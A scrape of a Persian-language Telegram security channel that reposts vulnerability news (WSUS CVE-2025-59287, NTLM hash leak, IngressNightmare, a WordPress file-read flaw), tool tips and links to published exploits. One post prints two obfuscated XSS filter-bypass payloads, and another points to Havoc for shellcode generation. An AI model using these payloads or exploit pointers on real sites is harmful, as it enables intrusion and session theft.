“یادگیری هوش مصنوعی الان مثل خرید بیت کوین توی 2013 میمونه!”
موافقا لایک مخالفا دیسلایک 👍
⭐️ @RadvanSec
موافقا لایک مخالفا دیسلایک 👍
⭐️ @RadvanSec
👍27👎13
مایکروسافت آپدیت خاص (out-of-band) برای وصله کردن یک نقص بحرانی در Windows Server Update Services (WSUS) منتشر کرده است.
شناسهی این آسیبپذیری CVE-2025-59287 است.
اگر سرور ویندوزی نقش WSUS فعال داشته باشه، مهاجم بدون احراز هویت میتونه کدی به صورت Remote اجرا کنه با امتیازات SYSTEM.
مایکروسافت اعلام کرده این نقص امکان wormable شدن (پراکنده شدن خودکار در شبکهی سرورهای WSUS) رو داره.
لیست نسخههای ویندوز سرور آسیبپذیر و آپدیتها به ترتیب: Windows Server 2025، 23H2، 2022، 2019، 2016، 2012 R2 و 2012.
⭐️ @RadvanSec
شناسهی این آسیبپذیری CVE-2025-59287 است.
اگر سرور ویندوزی نقش WSUS فعال داشته باشه، مهاجم بدون احراز هویت میتونه کدی به صورت Remote اجرا کنه با امتیازات SYSTEM.
مایکروسافت اعلام کرده این نقص امکان wormable شدن (پراکنده شدن خودکار در شبکهی سرورهای WSUS) رو داره.
لیست نسخههای ویندوز سرور آسیبپذیر و آپدیتها به ترتیب: Windows Server 2025، 23H2، 2022، 2019، 2016، 2012 R2 و 2012.
⭐️ @RadvanSec
❤2👌1
🛑 انتشار PoC Exploit برای آسیبپذیری حیاتی در WSUS
◀️یک PoC Exploit برای آسیبپذیری بحرانی در سرویس WSUS مایکروسافت منتشر شده است که به مهاجم بدون احراز هویت اجازه میدهد کد دلخواه را با سطح دسترسی SYSTEM روی سرورهای آسیبپذیر اجرا کند.
◀️این آسیبپذیری با شناسه CVE-2025-59287 و امتیاز CVSS 9.8 شناسایی شده و ناشی از ضعف در فرآیند deserialization دادههای غیرقابل اعتماد در بخش AuthorizationCookie است.
◀️مایکروسافت این نقص را در Patch Tuesday اکتبر 2025 اصلاح کرده است. بهرهبرداری موفق میتواند زیرساخت بهروزرسانی سازمانی را کاملاً در معرض خطر قرار دهد و منجر به تسلط کامل مهاجم بر سرور WSUS شود.
https://gist.github.com/hawktrace/880b54fb9c07ddb028baaae401bd3951
⭐️ @RadvanSec
◀️یک PoC Exploit برای آسیبپذیری بحرانی در سرویس WSUS مایکروسافت منتشر شده است که به مهاجم بدون احراز هویت اجازه میدهد کد دلخواه را با سطح دسترسی SYSTEM روی سرورهای آسیبپذیر اجرا کند.
◀️این آسیبپذیری با شناسه CVE-2025-59287 و امتیاز CVSS 9.8 شناسایی شده و ناشی از ضعف در فرآیند deserialization دادههای غیرقابل اعتماد در بخش AuthorizationCookie است.
◀️مایکروسافت این نقص را در Patch Tuesday اکتبر 2025 اصلاح کرده است. بهرهبرداری موفق میتواند زیرساخت بهروزرسانی سازمانی را کاملاً در معرض خطر قرار دهد و منجر به تسلط کامل مهاجم بر سرور WSUS شود.
https://gist.github.com/hawktrace/880b54fb9c07ddb028baaae401bd3951
⭐️ @RadvanSec
Gist
CVE-2025-59287
CVE-2025-59287. GitHub Gist: instantly share code, notes, and snippets.
❤3
اسم پروژه: Translate Shell (فرمان trans).
پشت صحنه: میتونه از چند موتور ترجمه استفاده کنه (Google پیشفرض، همچنین Bing، Yandex، Apertium و ...).
نیاز به اینترنت دارد (مگر زمانی که از دیکشنریهای آفلاین مثل Stardict یا مدل محلی استفاده کنی).
نصب (سریع)
Debian / Ubuntu
Fedora
Arch (AUR)
⭐️ @RadvanSec
پشت صحنه: میتونه از چند موتور ترجمه استفاده کنه (Google پیشفرض، همچنین Bing، Yandex، Apertium و ...).
نیاز به اینترنت دارد (مگر زمانی که از دیکشنریهای آفلاین مثل Stardict یا مدل محلی استفاده کنی).
نصب (سریع)
Debian / Ubuntu
sudo apt update
sudo apt install translate-shell
# یا اگر در repo نیست:
wget git.io/trans
chmod +x trans
sudo mv trans /usr/local/bin/
Fedora
sudo dnf install translate-shell
Arch (AUR)
paru -S translate-shell # یا yaourt/pacman-AUR مورد علاقهات
از سورس / دستی
https://github.com/soimort/translate-shell
⭐️ @RadvanSec
❤2
از جابهجا شدن بین تبها برای OSINT (اطلاعات متنباز — Open Source Intelligence) و Recon (شناسایی و بازشناسی) خستهاید؟ فقط به Discord ما بپیوندید و تایپ کنید
✅ IP & Domain Lookup (جستوجوی آدرس IP و دامنه)
✅ Email & Phone OSINT (جمعآوری اطلاعات ایمیل و شماره تلفن — OSINT)
✅ Subdomain Enumeration (پیمایش زیردامنهها)
✅ Reverse Image Search (جستوجوی معکوس تصویر)
✅ URL & Virus Scanners (اسکنر آدرسها و بدافزار)
✅ Temp Email (ایمیل موقت)، QR Tools (ابزارهای کد QR)، و موارد دیگر
🌟 میتوانید در یک دقیقه CTF بسازید و بازی کنید — درست داخل Discord!
همین حالا امتحان کنید — سریع، ساده و همهچیز در یک چت.
🔗 [https://discord.gg/u7uMFV833h](https://discord.gg/u7uMFV833h)
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
⭐️ @RadvanSec
sudo help (فرماننما برای اجرا با دسترسی ادمین در لینوکس/یونیکس) تا ابزارهای قدرتمند در عرض چند ثانیه باز شود!✅ IP & Domain Lookup (جستوجوی آدرس IP و دامنه)
✅ Email & Phone OSINT (جمعآوری اطلاعات ایمیل و شماره تلفن — OSINT)
✅ Subdomain Enumeration (پیمایش زیردامنهها)
✅ Reverse Image Search (جستوجوی معکوس تصویر)
✅ URL & Virus Scanners (اسکنر آدرسها و بدافزار)
✅ Temp Email (ایمیل موقت)، QR Tools (ابزارهای کد QR)، و موارد دیگر
🌟 میتوانید در یک دقیقه CTF بسازید و بازی کنید — درست داخل Discord!
همین حالا امتحان کنید — سریع، ساده و همهچیز در یک چت.
🔗 [https://discord.gg/u7uMFV833h](https://discord.gg/u7uMFV833h)
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
⭐️ @RadvanSec
❤3
XSS Bypass
Payloads:
Payloads:
<img+src%3Dx+onerror%3D"%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041">
--'<00 foo="<a%20href="javanoscript:prompt(404)">XSS-Click</00>--%20//
❤2👌1
برای generate کردن شل کد میتونید از ابزار Havoc استفاده کنید
https://github.com/HavocFramework/Havoc.git
⭐️ @RadvanSec
https://github.com/HavocFramework/Havoc.git
⭐️ @RadvanSec
GitHub
GitHub - HavocFramework/Havoc: The Havoc Framework
The Havoc Framework. Contribute to HavocFramework/Havoc development by creating an account on GitHub.
❤3⚡1👍1
RadvanSec
BugBounty Program Google Dorks (part2): inurl:/security ext:txt "contact" "powered by synack" intext:responsible disclosure bounty inurl: private bugbountyprogram inurl:/.well-known/security ext:txt inurl:/.well-known/security ext:txt intext:hackerone inurl:/.well…
https://news.1rj.ru/str/bbprograms
علاوه بر دورک هایی که در پیام ریپلی شده موجوده، میتونین برای پیدا کردن تارگت های خارج پلتفرم باگ بانتی، از این چنل استفاده کنین
⭐️ @RadvanSec
علاوه بر دورک هایی که در پیام ریپلی شده موجوده، میتونین برای پیدا کردن تارگت های خارج پلتفرم باگ بانتی، از این چنل استفاده کنین
⭐️ @RadvanSec
❤7
Forwarded from Fuzzing ZONE (0x0F1)
تحلیل یک سری حملات، که توسط باج افزار Qilin انجام شده است
https://blog.talosintelligence.com/uncovering-qilin-attack-methods-exposed-through-multiple-cases/
@FUZZ0x
https://blog.talosintelligence.com/uncovering-qilin-attack-methods-exposed-through-multiple-cases/
@FUZZ0x
Cisco Talos Blog
Uncovering Qilin attack methods exposed through multiple cases
Cisco Talos investigated the Qilin ransomware group, uncovering its frequent attacks on the manufacturing sector, use of legitimate tools for credential theft and data exfiltration, and sophisticated methods for lateral movement, evasion, and persistence.
👍3
CVE-2025-24071
Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar archive, leading to NTLM hash disclosure. The user does not need to open or execute the file simply extracting it is enough to trigger the leak.
-------------------------
«Windows Explorer بهطور خودکار وقتی یک فایل .library-ms از یک آرشیو .rar استخراج میشود، یک درخواست احراز هویت SMB (پروتکل اشتراک فایل مایکروسافت) آغاز میکند که منجر به افشای هش NTLM (هشِ پروتکل احراز هویت ویندوز) میشود. کاربر نیازی به باز کردن یا اجرای فایل ندارد — صرفِ استخراج آن کافی است تا نشت رخ دهد.»
Exploit
⭐️ @RadvanSec
Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar archive, leading to NTLM hash disclosure. The user does not need to open or execute the file simply extracting it is enough to trigger the leak.
-------------------------
«Windows Explorer بهطور خودکار وقتی یک فایل .library-ms از یک آرشیو .rar استخراج میشود، یک درخواست احراز هویت SMB (پروتکل اشتراک فایل مایکروسافت) آغاز میکند که منجر به افشای هش NTLM (هشِ پروتکل احراز هویت ویندوز) میشود. کاربر نیازی به باز کردن یا اجرای فایل ندارد — صرفِ استخراج آن کافی است تا نشت رخ دهد.»
Exploit
⭐️ @RadvanSec
❤5
Exploit for Ingress NGINX - IngressNightmare
This project provides an exploit targeting critical unauthenticated Remote Code Execution (RCE) vulnerabilities in the Ingress NGINX Controller for Kubernetes, collectively referred to as IngressNightmare. (Research by Wiz)
In the original research, the Wiz team did not provide a PoC or a functional exploit, so we decided to create our own and share it with the community.
——————————————————
اکسپلویت برای Ingress NGINX - IngressNightmare
این پروژه اکسپلویتی را ارائه میدهد که آسیبپذیریهای حیاتی اجرای کد از راه دور (RCE) احراز هویت نشده در کنترلر Ingress NGINX برای Kubernetes، که به طور کلی IngressNightmare نامیده میشود، را هدف قرار میدهد. (تحقیق توسط Wiz)
در تحقیق اصلی، تیم Wiz یک PoC یا یک اکسپلویت کاربردی ارائه نکرد، بنابراین ما تصمیم گرفتیم خودمان آن را ایجاد کنیم و با جامعه به اشتراک بگذاریم.
Exploit
⭐️ @RadvanSec
This project provides an exploit targeting critical unauthenticated Remote Code Execution (RCE) vulnerabilities in the Ingress NGINX Controller for Kubernetes, collectively referred to as IngressNightmare. (Research by Wiz)
In the original research, the Wiz team did not provide a PoC or a functional exploit, so we decided to create our own and share it with the community.
——————————————————
اکسپلویت برای Ingress NGINX - IngressNightmare
این پروژه اکسپلویتی را ارائه میدهد که آسیبپذیریهای حیاتی اجرای کد از راه دور (RCE) احراز هویت نشده در کنترلر Ingress NGINX برای Kubernetes، که به طور کلی IngressNightmare نامیده میشود، را هدف قرار میدهد. (تحقیق توسط Wiz)
در تحقیق اصلی، تیم Wiz یک PoC یا یک اکسپلویت کاربردی ارائه نکرد، بنابراین ما تصمیم گرفتیم خودمان آن را ایجاد کنیم و با جامعه به اشتراک بگذاریم.
Exploit
⭐️ @RadvanSec
👍2❤1
#MITRE ATT&CK v18 Release
October 2025
تغییرات کلیدی:
- بازنگری بخش دفاعی و جایگزینی «تشخیص (Detections)» با «راهکارهای تشخیص (Detection Strategies)»
- اضافه شدن شاخصهای تحلیلی (Analytics) و اجزای داده (Data Components) جدید
- بازگردانی قابلیت «سوءاستفاده از امکانات دسترسپذیری» (Abuse Accessibility Features) در بخش موبایل
- آمار کلی: ۹۱۰ مورد نرمافزار، ۱۷۶ گروه، ۵۵ کمپین ثبت شده در این نسخه
🔗 https://attack.mitre.org/resources/updates/updates-october-2025/
⭐️ @RadvanSec
October 2025
تغییرات کلیدی:
- بازنگری بخش دفاعی و جایگزینی «تشخیص (Detections)» با «راهکارهای تشخیص (Detection Strategies)»
- اضافه شدن شاخصهای تحلیلی (Analytics) و اجزای داده (Data Components) جدید
- بازگردانی قابلیت «سوءاستفاده از امکانات دسترسپذیری» (Abuse Accessibility Features) در بخش موبایل
- آمار کلی: ۹۱۰ مورد نرمافزار، ۱۷۶ گروه، ۵۵ کمپین ثبت شده در این نسخه
🔗 https://attack.mitre.org/resources/updates/updates-october-2025/
⭐️ @RadvanSec
👍5❤2
Forwarded from OnHex
🔴 آسیب پذیری با شناسه ی CVE-2025-11705 در افزونه ی وردپرسی Anti-Malware Security and Brute-Force Firewall کشف و اصلاح شده که امکان افشای اطلاعات رو به مهاجمی که عضو سایت (Subscriber) هستش، میده.
نسخه های تحت تاثیر: ۴.۲۳.۸۱ و قبل تر
نسخه اصلاح شده: ۴.۲۳.۸۳
سایتهایی که از نسخه های آسیب پذیر استفاده میکنن و همچنین امکان عضویت داخلشون فعال هستش، تحت تاثیر آسیب پذیری هستن.
آسیب پذیری در تابع GOTMLS_ajax_scan هستش و امکان خوندن فایلهای دلخواه رو به مهاجم میده. مثلا مهاجم میتونه فایل wp-config.php رو بخونه.
#وردپرس #آسیب_پذیری_امنیتی
#worpress #CVE
🆔 @onhex_ir
➡️ ALL Link
نسخه های تحت تاثیر: ۴.۲۳.۸۱ و قبل تر
نسخه اصلاح شده: ۴.۲۳.۸۳
سایتهایی که از نسخه های آسیب پذیر استفاده میکنن و همچنین امکان عضویت داخلشون فعال هستش، تحت تاثیر آسیب پذیری هستن.
آسیب پذیری در تابع GOTMLS_ajax_scan هستش و امکان خوندن فایلهای دلخواه رو به مهاجم میده. مثلا مهاجم میتونه فایل wp-config.php رو بخونه.
#وردپرس #آسیب_پذیری_امنیتی
#worpress #CVE
🆔 @onhex_ir
➡️ ALL Link
WordPress.org
Anti-Malware Security and Brute-Force Firewall
This Anti-Malware scanner searches for Malware, Viruses, and other security threats and vulnerabilities on your server and it helps you fix them.
❤1👍1